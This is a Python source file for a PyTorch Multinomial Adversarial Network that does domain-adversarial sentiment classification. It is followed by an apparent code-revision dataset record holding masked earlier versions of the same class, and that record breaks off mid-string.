            if (epoch + 1) % kwargs['display_step'] == 0:
                print('Epoch:', '%04d, done' % (epoch + 1))
        return loss_d_res, l_d_res, l_c_res

    def transform(self, d, *args, **kwargs):
        """Evaluate the trained model on the first unlabeled (test) domain.

        Returns:
            Tuple ``(accuracy, n_correct)``.
        """
        F_d = self.F_d[opt.domains[0]]
        self.F_s.eval()
        F_d.eval()
        self.C.eval()
        _, _, _, it = self.prepare_data(d)
        it = it[opt.unlabeled_domains[0]]
        correct = 0
        total = 0
        confusion = ConfusionMeter(opt.num_labels)
        with torch.no_grad():  # inference only; skip autograd bookkeeping
            for inputs, targets in it:
                inputs = inputs.to(opt.device)
                targets = targets.to(opt.device)
                features = torch.cat((self.F_s(inputs), F_d(inputs)), dim=1)
                outputs = self.C(features)
                _, pred = torch.max(outputs, 1)
                confusion.add(pred.data, targets.data)
                total += targets.size(0)
                correct += (pred == targets).sum().item()
        acc = correct / total
        return acc, correct

    def get_name(self):
        """Return (and cache) the display name ``"MAN(k,m,1)"``."""
        if self._name is None:
            self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)
        return self._name
<|reserved_special_token_1|>
#This version assumes domains = train/test set
import numpy as np
from ..utils import Dataset
import math
import random
from .interface import TopicModel
from .man_model.models import *
from .man_model import utils
from .man_model.options import opt
import torch.utils.data as data_utils
from tqdm import tqdm
from collections import defaultdict
import itertools
from torchnet.meter import ConfusionMeter
import torch
import torch.nn as nn
import torch.nn.functional as functional
import torch.optim as optim
from torch.utils.data import ConcatDataset, DataLoader
"""
IMPORTANT: for some reason, Model (self.F_s,etc) will not work if inputs are not float32
=> need to convert. Dont know if same thing for target tho?
Also apparently, domain labels retrieved from get_domain_labels cannot be -1?
Output size for C HAS TO BE 2 even if it's a binary classification
"""
def softmax(x):
    """Compute the softmax of each row of the 2-D score array ``x``.

    The per-row maximum is subtracted first so that np.exp cannot
    overflow; the result is mathematically identical.
    """
    m = x.max(axis=1)[:, np.newaxis]
    e = np.exp(x - m)
    return e / e.sum(axis=1)[:, np.newaxis]
class MultinomialAdversarialNetwork(TopicModel):
    """Multinomial Adversarial Network (MAN); domains are the train/test sets.

    Jointly trains a shared feature extractor ``F_s``, one private extractor
    ``F_d`` per labeled domain, a sentiment classifier ``C`` and a domain
    discriminator ``D`` in an adversarial loop.  Hyper-parameters are read
    from the module-level ``opt`` object; labeled domains come from
    ``opt.domains`` and unlabeled ones from ``opt.unlabeled_domains``.
    """

    def __init__(self, k, m, model_params=None, log_params=None):
        super().__init__(k, m, model_params, log_params)

    def prepare_data(self, d):
        """Build per-domain ``DataLoader``s and fresh iterators over them.

        Args:
            d: dict mapping domain name -> dataset with a sparse feature
               matrix ``X`` and a label vector ``y``.  Labeled domains are
               treated as the train set, unlabeled domains as the test set.

        Returns:
            Tuple ``(train_loaders, train_iters, unlabeled_loaders,
            unlabeled_iters)``, each a dict keyed by domain name.
        """
        train_loaders, train_iters = {}, {}
        unlabeled_loaders, unlabeled_iters = {}, {}
        for domain in opt.domains:
            # The models require float32 inputs, hence the explicit cast.
            features = torch.from_numpy(d[domain].X.todense().astype('float32'))
            target = torch.from_numpy(d[domain].y)
            train = data_utils.TensorDataset(features, target)
            train_loaders[domain] = DataLoader(train, opt.batch_size,
                                               shuffle=True)
            train_iters[domain] = iter(train_loaders[domain])
        for domain in opt.unlabeled_domains:
            features = torch.from_numpy(d[domain].X.todense().astype('float32'))
            target = torch.from_numpy(d[domain].y)
            uset = data_utils.TensorDataset(features, target)
            unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,
                                                   shuffle=True)
            unlabeled_iters[domain] = iter(unlabeled_loaders[domain])
        return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters

    def fit(self, d, *args, **kwargs):
        """Run the adversarial training loop.

        Args:
            d: domain -> dataset dict (see :meth:`prepare_data`); must
               contain a ``'train'`` entry whose ``X`` fixes the input width.
            kwargs: must contain ``'display_step'`` (epoch print interval).

        Returns:
            Three per-epoch lists: discriminator loss on the first unlabeled
            domain, the epoch's last adversarial loss ``l_d`` and the epoch's
            last classification loss ``l_c``.
        """
        train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (
            self.prepare_data(d))
        # Build the networks.  C consumes the concatenation of shared and
        # private features; its output size must be 2 even for binary labels.
        input_dim = d['train'].X.shape[1]
        self.F_s = MlpFeatureExtractor(input_dim, opt.F_hidden_sizes,
                                       opt.shared_hidden_size, opt.dropout)
        self.F_d = {}
        for domain in opt.domains:
            self.F_d[domain] = MlpFeatureExtractor(
                input_dim, opt.F_hidden_sizes, opt.domain_hidden_size,
                opt.dropout)
        self.C = SentimentClassifier(
            opt.C_layers, opt.shared_hidden_size + opt.domain_hidden_size,
            opt.shared_hidden_size + opt.domain_hidden_size, 2,
            opt.dropout, opt.C_bn)
        self.D = DomainClassifier(
            opt.D_layers, opt.shared_hidden_size, opt.shared_hidden_size,
            len(opt.all_domains), opt.loss, opt.dropout, opt.D_bn)
        self.F_s, self.C, self.D = (self.F_s.to(opt.device),
                                    self.C.to(opt.device),
                                    self.D.to(opt.device))
        for f_d in self.F_d.values():
            f_d.to(opt.device)  # nn.Module.to moves parameters in place
        # Optimizers: one for F_s / F_d / C, one for the discriminator D.
        optimizer = optim.Adam(itertools.chain(*map(list,
            [self.F_s.parameters() if self.F_s else [], self.C.parameters()]
            + [f.parameters() for f in self.F_d.values()])), lr=0.0001)
        optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)
        loss_d_res = []
        l_d_res = []
        l_c_res = []
        for epoch in range(opt.max_epoch):
            self.F_s.train()
            self.C.train()
            self.D.train()
            for f in self.F_d.values():
                f.train()
            # Per-domain training accuracy and discriminator accuracy.
            correct, total = defaultdict(int), defaultdict(int)
            d_correct, d_total = 0, 0
            # Conceptually, one epoch = one pass over the first labeled domain.
            num_iter = len(train_loaders[opt.domains[0]])
            for _i in range(num_iter):
                # ---- D step: update the discriminator only. ----
                # BUG FIX: the original `map(utils.freeze_net, self.F_d.values())`
                # was never consumed -- map() is lazy in Python 3 -- so the
                # private extractors were never frozen.  Use explicit loops.
                utils.freeze_net(self.F_s)
                for f_d in self.F_d.values():
                    utils.freeze_net(f_d)
                utils.freeze_net(self.C)
                utils.unfreeze_net(self.D)
                for _ in range(opt.n_critic):  # optional WGAN n_critic trick
                    self.D.zero_grad()
                    loss_d = {}
                    for domain in opt.unlabeled_domains:
                        d_inputs, _ = utils.endless_get_next_batch(
                            unlabeled_loaders, unlabeled_iters, domain)
                        d_inputs = d_inputs.to(opt.device)
                        d_targets = utils.get_domain_label(opt.loss, domain,
                                                           len(d_inputs))
                        d_outputs = self.D(self.F_s(d_inputs))
                        _, pred = torch.max(d_outputs, 1)
                        d_total += len(d_inputs)
                        if opt.loss.lower() == 'l2':
                            # L2 targets are per-domain rows; recover indices.
                            _, tgt_indices = torch.max(d_targets, 1)
                            d_correct += (pred == tgt_indices).sum().item()
                            l_d = functional.mse_loss(d_outputs, d_targets)
                        else:
                            d_correct += (pred == d_targets).sum().item()
                            l_d = functional.nll_loss(d_outputs, d_targets)
                        l_d.backward()
                        loss_d[domain] = l_d.item()
                    optimizerD.step()
                # ---- F & C step: update extractors and classifier. ----
                utils.unfreeze_net(self.F_s)
                for f_d in self.F_d.values():
                    utils.unfreeze_net(f_d)  # same lazy-map fix as above
                utils.unfreeze_net(self.C)
                utils.freeze_net(self.D)
                self.F_s.zero_grad()
                for f_d in self.F_d.values():
                    f_d.zero_grad()
                self.C.zero_grad()
                for domain in opt.domains:
                    inputs, targets = utils.endless_get_next_batch(
                        train_loaders, train_iters, domain)
                    targets = targets.to(opt.device)
                    inputs = inputs.to(opt.device)
                    shared_feat = self.F_s(inputs)
                    domain_feat = self.F_d[domain](inputs)
                    features = torch.cat((shared_feat, domain_feat), dim=1)
                    c_outputs = self.C(features)
                    l_c = functional.nll_loss(c_outputs, targets)
                    # retain_graph: F_s's graph is reused by the adversarial
                    # pass below within the same optimizer step.
                    l_c.backward(retain_graph=True)
                    _, pred = torch.max(c_outputs, 1)
                    total[domain] += targets.size(0)
                    correct[domain] += (pred == targets).sum().item()
                # Push F_s away from D (gradient reversal or L2-to-uniform).
                for domain in opt.unlabeled_domains:
                    d_inputs, _ = utils.endless_get_next_batch(
                        unlabeled_loaders, unlabeled_iters, domain)
                    d_inputs = d_inputs.to(opt.device)
                    d_outputs = self.D(self.F_s(d_inputs))
                    if opt.loss.lower() == 'gr':
                        d_targets = utils.get_domain_label(opt.loss, domain,
                                                           len(d_inputs))
                        l_d = functional.nll_loss(d_outputs, d_targets)
                        if opt.lambd > 0:
                            l_d *= -opt.lambd
                    elif opt.loss.lower() == 'l2':
                        d_targets = utils.get_random_domain_label(
                            opt.loss, len(d_inputs))
                        l_d = functional.mse_loss(d_outputs, d_targets)
                        if opt.lambd > 0:
                            l_d *= opt.lambd
                    # NOTE(review): if opt.loss is neither 'gr' nor 'l2' this
                    # backpropagates a stale l_d from the D step -- confirm
                    # only those two loss modes are ever configured.
                    l_d.backward()
                optimizer.step()
            # Record this epoch's last-iteration losses.  Generalized from
            # the hard-coded loss_d['test'] to the first unlabeled domain.
            loss_d_res.append(loss_d[opt.unlabeled_domains[0]])
            l_d_res.append(l_d.item())
            l_c_res.append(l_c.item())
            if (epoch + 1) % kwargs["display_step"] == 0:
                print("Epoch:", "%04d, done" % (epoch + 1))
        return loss_d_res, l_d_res, l_c_res

    def transform(self, d, *args, **kwargs):
        """Evaluate the trained model on the first unlabeled (test) domain.

        Returns:
            Tuple ``(accuracy, n_correct)``.
        """
        F_d = self.F_d[opt.domains[0]]
        self.F_s.eval()
        F_d.eval()
        self.C.eval()
        _, _, _, it = self.prepare_data(d)
        it = it[opt.unlabeled_domains[0]]
        correct = 0
        total = 0
        confusion = ConfusionMeter(opt.num_labels)
        with torch.no_grad():  # inference only; skip autograd bookkeeping
            for inputs, targets in it:
                inputs = inputs.to(opt.device)
                targets = targets.to(opt.device)
                features = torch.cat((self.F_s(inputs), F_d(inputs)), dim=1)
                outputs = self.C(features)
                _, pred = torch.max(outputs, 1)
                confusion.add(pred.data, targets.data)
                total += targets.size(0)
                correct += (pred == targets).sum().item()
        acc = correct / total
        return acc, correct

    def get_name(self):
        """Return (and cache) the display name ``"MAN(k,m,1)"``."""
        if self._name is None:
            self._name = "MAN({},{},{})".format(self.k, self.m, 1)
        return self._name
|
flexible
|
{
"blob_id": "8f01934472805b5ad6dca328483a7ac79ae7748a",
"index": 6474,
"step-1": "<mask token>\n\n\nclass MultinomialAdversarialNetwork(TopicModel):\n <mask token>\n\n def prepare_data(self, d):\n \"\"\"\n Assume d is a dictionary of dataset where d[domain] = another dataset class\n Assume labeled domain = train set, unlabeled = test\n \"\"\"\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n train = data_utils.TensorDataset(features, target)\n train_loaders[domain] = DataLoader(train, opt.batch_size,\n shuffle=True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n uset = data_utils.TensorDataset(features, target)\n unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,\n shuffle=True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters\n\n def fit(self, d, *args, **kwargs):\n train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self\n .prepare_data(d))\n self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.\n F_hidden_sizes, opt.shared_hidden_size, opt.dropout)\n self.F_d = {}\n for domain in opt.domains:\n self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],\n opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)\n self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +\n opt.domain_hidden_size, opt.shared_hidden_size + opt.\n domain_hidden_size, 2, opt.dropout, opt.C_bn)\n self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt\n .shared_hidden_size, len(opt.all_domains), opt.loss, opt.\n dropout, opt.D_bn)\n self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.\n device), self.D.to(opt.device)\n for f_d in self.F_d.values():\n f_d = f_d.to(opt.device)\n 
optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.\n parameters() if self.F_s else [], self.C.parameters()] + [f.\n parameters() for f in self.F_d.values()])), lr=0.0001)\n optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)\n loss_d_res = []\n l_d_res = []\n l_c_res = []\n for epoch in range(opt.max_epoch):\n self.F_s.train()\n self.C.train()\n self.D.train()\n for f in self.F_d.values():\n f.train()\n correct, total = defaultdict(int), defaultdict(int)\n d_correct, d_total = 0, 0\n num_iter = len(train_loaders[opt.domains[0]])\n for i in range(num_iter):\n utils.freeze_net(self.F_s)\n map(utils.freeze_net, self.F_d.values())\n utils.freeze_net(self.C)\n utils.unfreeze_net(self.D)\n n_critic = opt.n_critic\n for _ in range(n_critic):\n self.D.zero_grad()\n loss_d = {}\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n _, pred = torch.max(d_outputs, 1)\n d_total += len(d_inputs)\n if opt.loss.lower() == 'l2':\n _, tgt_indices = torch.max(d_targets, 1)\n d_correct += (pred == tgt_indices).sum().item()\n l_d = functional.mse_loss(d_outputs, d_targets)\n l_d.backward()\n else:\n d_correct += (pred == d_targets).sum().item()\n l_d = functional.nll_loss(d_outputs, d_targets)\n l_d.backward()\n loss_d[domain] = l_d.item()\n optimizerD.step()\n utils.unfreeze_net(self.F_s)\n map(utils.unfreeze_net, self.F_d.values())\n utils.unfreeze_net(self.C)\n utils.freeze_net(self.D)\n self.F_s.zero_grad()\n for f_d in self.F_d.values():\n f_d.zero_grad()\n self.C.zero_grad()\n shared_feats, domain_feats = [], []\n for domain in opt.domains:\n inputs, targets = utils.endless_get_next_batch(\n train_loaders, train_iters, domain)\n targets = targets.to(opt.device)\n inputs = inputs.to(opt.device)\n shared_feat = 
self.F_s(inputs)\n shared_feats.append(shared_feat)\n domain_feat = self.F_d[domain](inputs)\n domain_feats.append(domain_feat)\n features = torch.cat((shared_feat, domain_feat), dim=1)\n c_outputs = self.C(features)\n l_c = functional.nll_loss(c_outputs, targets)\n l_c.backward(retain_graph=True)\n _, pred = torch.max(c_outputs, 1)\n total[domain] += targets.size(0)\n correct[domain] += (pred == targets).sum().item()\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n if opt.loss.lower() == 'gr':\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n l_d = functional.nll_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= -opt.lambd\n elif opt.loss.lower() == 'l2':\n d_targets = utils.get_random_domain_label(opt.loss,\n len(d_inputs))\n l_d = functional.mse_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= opt.lambd\n l_d.backward()\n optimizer.step()\n loss_d_res.append(loss_d['test'])\n l_d_res.append(l_d.item())\n l_c_res.append(l_c.item())\n if (epoch + 1) % kwargs['display_step'] == 0:\n print('Epoch:', '%04d, done' % (epoch + 1))\n return loss_d_res, l_d_res, l_c_res\n <mask token>\n\n def get_name(self):\n if self._name is None:\n self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)\n return self._name\n",
"step-2": "<mask token>\n\n\nclass MultinomialAdversarialNetwork(TopicModel):\n\n def __init__(self, k, m, model_params=None, log_params=None):\n super().__init__(k, m, model_params, log_params)\n\n def prepare_data(self, d):\n \"\"\"\n Assume d is a dictionary of dataset where d[domain] = another dataset class\n Assume labeled domain = train set, unlabeled = test\n \"\"\"\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n train = data_utils.TensorDataset(features, target)\n train_loaders[domain] = DataLoader(train, opt.batch_size,\n shuffle=True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n uset = data_utils.TensorDataset(features, target)\n unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,\n shuffle=True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters\n\n def fit(self, d, *args, **kwargs):\n train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self\n .prepare_data(d))\n self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.\n F_hidden_sizes, opt.shared_hidden_size, opt.dropout)\n self.F_d = {}\n for domain in opt.domains:\n self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],\n opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)\n self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +\n opt.domain_hidden_size, opt.shared_hidden_size + opt.\n domain_hidden_size, 2, opt.dropout, opt.C_bn)\n self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt\n .shared_hidden_size, len(opt.all_domains), opt.loss, opt.\n dropout, opt.D_bn)\n self.F_s, self.C, self.D = self.F_s.to(opt.device), 
self.C.to(opt.\n device), self.D.to(opt.device)\n for f_d in self.F_d.values():\n f_d = f_d.to(opt.device)\n optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.\n parameters() if self.F_s else [], self.C.parameters()] + [f.\n parameters() for f in self.F_d.values()])), lr=0.0001)\n optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)\n loss_d_res = []\n l_d_res = []\n l_c_res = []\n for epoch in range(opt.max_epoch):\n self.F_s.train()\n self.C.train()\n self.D.train()\n for f in self.F_d.values():\n f.train()\n correct, total = defaultdict(int), defaultdict(int)\n d_correct, d_total = 0, 0\n num_iter = len(train_loaders[opt.domains[0]])\n for i in range(num_iter):\n utils.freeze_net(self.F_s)\n map(utils.freeze_net, self.F_d.values())\n utils.freeze_net(self.C)\n utils.unfreeze_net(self.D)\n n_critic = opt.n_critic\n for _ in range(n_critic):\n self.D.zero_grad()\n loss_d = {}\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n _, pred = torch.max(d_outputs, 1)\n d_total += len(d_inputs)\n if opt.loss.lower() == 'l2':\n _, tgt_indices = torch.max(d_targets, 1)\n d_correct += (pred == tgt_indices).sum().item()\n l_d = functional.mse_loss(d_outputs, d_targets)\n l_d.backward()\n else:\n d_correct += (pred == d_targets).sum().item()\n l_d = functional.nll_loss(d_outputs, d_targets)\n l_d.backward()\n loss_d[domain] = l_d.item()\n optimizerD.step()\n utils.unfreeze_net(self.F_s)\n map(utils.unfreeze_net, self.F_d.values())\n utils.unfreeze_net(self.C)\n utils.freeze_net(self.D)\n self.F_s.zero_grad()\n for f_d in self.F_d.values():\n f_d.zero_grad()\n self.C.zero_grad()\n shared_feats, domain_feats = [], []\n for domain in opt.domains:\n inputs, targets = utils.endless_get_next_batch(\n train_loaders, 
train_iters, domain)\n targets = targets.to(opt.device)\n inputs = inputs.to(opt.device)\n shared_feat = self.F_s(inputs)\n shared_feats.append(shared_feat)\n domain_feat = self.F_d[domain](inputs)\n domain_feats.append(domain_feat)\n features = torch.cat((shared_feat, domain_feat), dim=1)\n c_outputs = self.C(features)\n l_c = functional.nll_loss(c_outputs, targets)\n l_c.backward(retain_graph=True)\n _, pred = torch.max(c_outputs, 1)\n total[domain] += targets.size(0)\n correct[domain] += (pred == targets).sum().item()\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n if opt.loss.lower() == 'gr':\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n l_d = functional.nll_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= -opt.lambd\n elif opt.loss.lower() == 'l2':\n d_targets = utils.get_random_domain_label(opt.loss,\n len(d_inputs))\n l_d = functional.mse_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= opt.lambd\n l_d.backward()\n optimizer.step()\n loss_d_res.append(loss_d['test'])\n l_d_res.append(l_d.item())\n l_c_res.append(l_c.item())\n if (epoch + 1) % kwargs['display_step'] == 0:\n print('Epoch:', '%04d, done' % (epoch + 1))\n return loss_d_res, l_d_res, l_c_res\n <mask token>\n\n def get_name(self):\n if self._name is None:\n self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)\n return self._name\n",
"step-3": "<mask token>\n\n\nclass MultinomialAdversarialNetwork(TopicModel):\n\n def __init__(self, k, m, model_params=None, log_params=None):\n super().__init__(k, m, model_params, log_params)\n\n def prepare_data(self, d):\n \"\"\"\n Assume d is a dictionary of dataset where d[domain] = another dataset class\n Assume labeled domain = train set, unlabeled = test\n \"\"\"\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n train = data_utils.TensorDataset(features, target)\n train_loaders[domain] = DataLoader(train, opt.batch_size,\n shuffle=True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n uset = data_utils.TensorDataset(features, target)\n unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,\n shuffle=True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters\n\n def fit(self, d, *args, **kwargs):\n train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self\n .prepare_data(d))\n self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.\n F_hidden_sizes, opt.shared_hidden_size, opt.dropout)\n self.F_d = {}\n for domain in opt.domains:\n self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],\n opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)\n self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +\n opt.domain_hidden_size, opt.shared_hidden_size + opt.\n domain_hidden_size, 2, opt.dropout, opt.C_bn)\n self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt\n .shared_hidden_size, len(opt.all_domains), opt.loss, opt.\n dropout, opt.D_bn)\n self.F_s, self.C, self.D = self.F_s.to(opt.device), 
self.C.to(opt.\n device), self.D.to(opt.device)\n for f_d in self.F_d.values():\n f_d = f_d.to(opt.device)\n optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.\n parameters() if self.F_s else [], self.C.parameters()] + [f.\n parameters() for f in self.F_d.values()])), lr=0.0001)\n optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)\n loss_d_res = []\n l_d_res = []\n l_c_res = []\n for epoch in range(opt.max_epoch):\n self.F_s.train()\n self.C.train()\n self.D.train()\n for f in self.F_d.values():\n f.train()\n correct, total = defaultdict(int), defaultdict(int)\n d_correct, d_total = 0, 0\n num_iter = len(train_loaders[opt.domains[0]])\n for i in range(num_iter):\n utils.freeze_net(self.F_s)\n map(utils.freeze_net, self.F_d.values())\n utils.freeze_net(self.C)\n utils.unfreeze_net(self.D)\n n_critic = opt.n_critic\n for _ in range(n_critic):\n self.D.zero_grad()\n loss_d = {}\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n _, pred = torch.max(d_outputs, 1)\n d_total += len(d_inputs)\n if opt.loss.lower() == 'l2':\n _, tgt_indices = torch.max(d_targets, 1)\n d_correct += (pred == tgt_indices).sum().item()\n l_d = functional.mse_loss(d_outputs, d_targets)\n l_d.backward()\n else:\n d_correct += (pred == d_targets).sum().item()\n l_d = functional.nll_loss(d_outputs, d_targets)\n l_d.backward()\n loss_d[domain] = l_d.item()\n optimizerD.step()\n utils.unfreeze_net(self.F_s)\n map(utils.unfreeze_net, self.F_d.values())\n utils.unfreeze_net(self.C)\n utils.freeze_net(self.D)\n self.F_s.zero_grad()\n for f_d in self.F_d.values():\n f_d.zero_grad()\n self.C.zero_grad()\n shared_feats, domain_feats = [], []\n for domain in opt.domains:\n inputs, targets = utils.endless_get_next_batch(\n train_loaders, 
train_iters, domain)\n targets = targets.to(opt.device)\n inputs = inputs.to(opt.device)\n shared_feat = self.F_s(inputs)\n shared_feats.append(shared_feat)\n domain_feat = self.F_d[domain](inputs)\n domain_feats.append(domain_feat)\n features = torch.cat((shared_feat, domain_feat), dim=1)\n c_outputs = self.C(features)\n l_c = functional.nll_loss(c_outputs, targets)\n l_c.backward(retain_graph=True)\n _, pred = torch.max(c_outputs, 1)\n total[domain] += targets.size(0)\n correct[domain] += (pred == targets).sum().item()\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n if opt.loss.lower() == 'gr':\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n l_d = functional.nll_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= -opt.lambd\n elif opt.loss.lower() == 'l2':\n d_targets = utils.get_random_domain_label(opt.loss,\n len(d_inputs))\n l_d = functional.mse_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= opt.lambd\n l_d.backward()\n optimizer.step()\n loss_d_res.append(loss_d['test'])\n l_d_res.append(l_d.item())\n l_c_res.append(l_c.item())\n if (epoch + 1) % kwargs['display_step'] == 0:\n print('Epoch:', '%04d, done' % (epoch + 1))\n return loss_d_res, l_d_res, l_c_res\n\n def transform(self, d, *args, **kwargs):\n F_d = self.F_d[opt.domains[0]]\n self.F_s.eval()\n F_d.eval()\n self.C.eval()\n _, _, _, it = self.prepare_data(d)\n it = it[opt.unlabeled_domains[0]]\n correct = 0\n total = 0\n confusion = ConfusionMeter(opt.num_labels)\n preds = []\n for inputs, targets in it:\n inputs = inputs.to(opt.device)\n targets = targets.to(opt.device)\n d_features = F_d(inputs)\n features = torch.cat((self.F_s(inputs), d_features), dim=1)\n outputs = self.C(features)\n _, pred = torch.max(outputs, 1)\n confusion.add(pred.data, targets.data)\n total += 
targets.size(0)\n correct += (pred == targets).sum().item()\n acc = correct / total\n return acc, correct\n\n def get_name(self):\n if self._name is None:\n self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)\n return self._name\n",
"step-4": "import numpy as np\nfrom ..utils import Dataset\nimport math\nimport random\nfrom .interface import TopicModel\nfrom .man_model.models import *\nfrom .man_model import utils\nfrom .man_model.options import opt\nimport torch.utils.data as data_utils\nfrom tqdm import tqdm\nfrom collections import defaultdict\nimport itertools\nfrom torchnet.meter import ConfusionMeter\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nimport torch.optim as optim\nfrom torch.utils.data import ConcatDataset, DataLoader\n<mask token>\n\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x, axis=1).reshape(-1, 1))\n return e_x / np.sum(e_x, axis=1).reshape(-1, 1)\n\n\nclass MultinomialAdversarialNetwork(TopicModel):\n\n def __init__(self, k, m, model_params=None, log_params=None):\n super().__init__(k, m, model_params, log_params)\n\n def prepare_data(self, d):\n \"\"\"\n Assume d is a dictionary of dataset where d[domain] = another dataset class\n Assume labeled domain = train set, unlabeled = test\n \"\"\"\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n train = data_utils.TensorDataset(features, target)\n train_loaders[domain] = DataLoader(train, opt.batch_size,\n shuffle=True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n uset = data_utils.TensorDataset(features, target)\n unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,\n shuffle=True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters\n\n def fit(self, d, *args, **kwargs):\n train_loaders, train_iters, 
